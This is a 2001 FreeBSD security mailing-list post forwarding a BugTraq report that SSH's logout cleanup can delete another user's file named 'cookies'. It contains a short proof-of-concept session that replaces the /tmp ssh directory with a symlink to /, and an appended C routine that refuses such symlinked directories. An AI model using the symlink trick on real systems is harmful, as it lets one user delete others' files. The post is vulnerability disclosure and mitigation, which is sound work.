From owner-freebsd-security Wed Jun 6 2:47:12 2001
Date: Wed, 6 Jun 2001 12:47:02 +0300
From: Valentin Nechayev
To: security@freebsd.org
Subject: [fwd] SSH allows deletion of other users files...
Message-ID: <20010606124702.A30808@lucky.net>
Reply-To: netch@lucky.net

Is it applicable to FreeBSD?
(BugTraq contains a report that it is)

/netch

Delivered-To: mailing list bugtraq@securityfocus.com
Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
Subject: SSH allows deletion of other users files...

SSH allows deletion of other users files.
=========================================

You can delete any file on the filesystem you want... as long as it's
called cookies.

Not really a very useful bug, but could cause annoyances to people who
actually like their cookies.

/home/zen/.netscape/cookies

sample exploit:-

[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

--zen-parse
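
The session in the forwarded report shows a logout cleanup deleting a file named cookies through a /tmp path that the user had replaced with a symlink. The following is an added example, not part of the original posts and not OpenSSH's code, of a cleanup routine in C that refuses such a swapped directory; the names safe_cleanup and demo and the /tmp/sess-* and /tmp/other-* paths are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Delete <dir>/cookies only if <dir> is a real directory owned by `owner`.
 * Returns 0 on success, -1 if the directory was refused or unlink failed. */
int safe_cleanup(const char *dir, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: fail if the last path component is a symlink. */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0) return -1;
    if (fstat(dfd, &st) < 0 || st.st_uid != owner) {
        close(dfd);
        return -1;
    }
    /* Resolve "cookies" relative to the descriptor that was just checked,
     * so a later swap of the path cannot redirect the delete. */
    int rc = unlinkat(dfd, "cookies", 0);
    close(dfd);
    if (rc == 0) rmdir(dir); /* rmdir() does not follow a symlink at dir */
    return rc;
}

/* Constructed scenario: a session directory with a cookies file, optionally
 * swapped for a symlink to a second directory that also holds a file named
 * cookies. Returns 1 if the cleanup behaved safely. */
int demo(int swap)
{
    char sess[] = "/tmp/sess-XXXXXX", other[] = "/tmp/other-XXXXXX";
    char f[64], g[64];
    if (!mkdtemp(sess) || !mkdtemp(other)) return 0;
    snprintf(f, sizeof f, "%s/cookies", sess);
    snprintf(g, sizeof g, "%s/cookies", other);
    close(open(f, O_WRONLY | O_CREAT, 0600));
    close(open(g, O_WRONLY | O_CREAT, 0600));
    if (swap) { /* same swap as in the report, aimed at `other` */
        unlink(f); rmdir(sess);
        if (symlink(other, sess) < 0) return 0;
    }
    int rc = safe_cleanup(sess, getuid());
    int kept = access(g, F_OK) == 0; /* the other file must survive */
    unlink(sess); unlink(g); rmdir(other);
    return kept && (swap ? rc == -1 : (rc == 0 && access(sess, F_OK) != 0));
}
int main(void) { return !(demo(0) && demo(1)); }
```

A privileged daemon would additionally drop to the session user's uid before running the cleanup, so that file permissions also limit what can be removed.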